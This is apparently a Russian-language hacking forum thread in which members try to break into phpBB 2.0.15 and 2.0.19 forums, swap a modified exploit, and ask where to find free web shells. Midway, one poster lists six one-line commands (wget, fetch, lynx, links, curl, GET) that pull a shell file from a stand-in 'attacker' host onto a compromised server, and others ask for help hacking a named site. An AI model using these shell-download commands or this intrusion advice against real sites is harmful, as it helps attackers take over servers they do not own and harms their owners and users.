Не понял что получилось?

Форум хакнуть =))
Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))

я уже вчера получил и просмотрел =)) у него почти получилось. Просто он не смог залить шелл.. Ну это уже кому как повезет с жертвой =))

слушайте а нах вам шелл заливать?кто качал последний выпуск езина от Мазы тот знает что там лежит измененный сплойт для пхпбб 2.0.15 и очень отлично работает и прост в управлении..

Народ, хоть тресни не могу понять как скачать или залить файл с\на сервер. Не могу составить запрос wget`ом. Помогите плиз.

хм я ощущаю себя маленькой собачкой которой показали вкусный кусок мяса а потом подвесили на прилачно расстоянии да так что мне до него не подпрыгнуть !!!=(

Вот сижу облизываюсь и хочу всех убить !!!!!!!!!!

mamont, но но !!!

2 mamont Ну что ты не понимаешь ТО??? Тебе дали сплоит вот и юзай .

вопервых я не могу создать для него среду по некоторым приченам =(
а биплатного шела вот неделю не могу найти чбы wget хотябы работал =(

может кто подскажет сайтик где халява на шелл ????

дааа, с wget'ом траблемка-то вышла...у меня тоже не заработал :(

Так может там просто не wget стоит, а например feetch или curl? :)

верняк... сначала посмотрите какая качалка стоит.. потом права куда скачиваете.. и всё тип-топ =)

Млииин ну вы даете, трудно почитать книжек, мануалов чтоль.......
Вот споссобы закачек, еси один не работает то заработает другой

метод wget:
wget http://attacker/shellfile -o /папка

метод fetch:
fetch -p http://attacker/shellfile -o /папка

метод lynx:
lynx -source http://attacker/shellfile > /папка

метод links:
links -source http://attacker/shellfile > /папка

метод curl:
curl http://attacker/shellfile -o /папка

метод GET:
GET http://attacker/shellfile > /папка

Перепробовал все описаные способы нифига не получилось. :( может просто руки кривые.
Помогите взломать http://в просьбы о взломах/forum/.

ph0en1x, если судить по тесту на определение версии, то форум принадлежит к 2.0.19, а не 2.0.15. Тогда тебе в поиск, там был эксплоит, правда он даалееекоо не везде работает.
ЗЫ Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(

А чо над ним биться то, всё равно ничего не получится. Ну только если у тебя есть логин и пасс админа или на форуме стоит мод смены стиля форума с главной страницы.

Есть два сплойта к 19.
Один: для выполнения команд если имеем логин и пасс админа.
Второй (наверное тот который ты имел ввиду): реализовать уязвимость можно только на форумах где стоит мод смены стиля форума с главной страницы (таких не очень много).

bandera, ну это я знаю. Там же вроде xss была? Не бывает такого, что взломать нельзя. Особенно у phpBB :)